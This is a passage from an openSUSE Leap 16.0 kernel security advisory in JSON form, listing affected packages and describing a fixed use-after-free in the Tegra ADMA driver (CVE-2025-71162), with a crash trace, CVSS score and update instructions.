"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
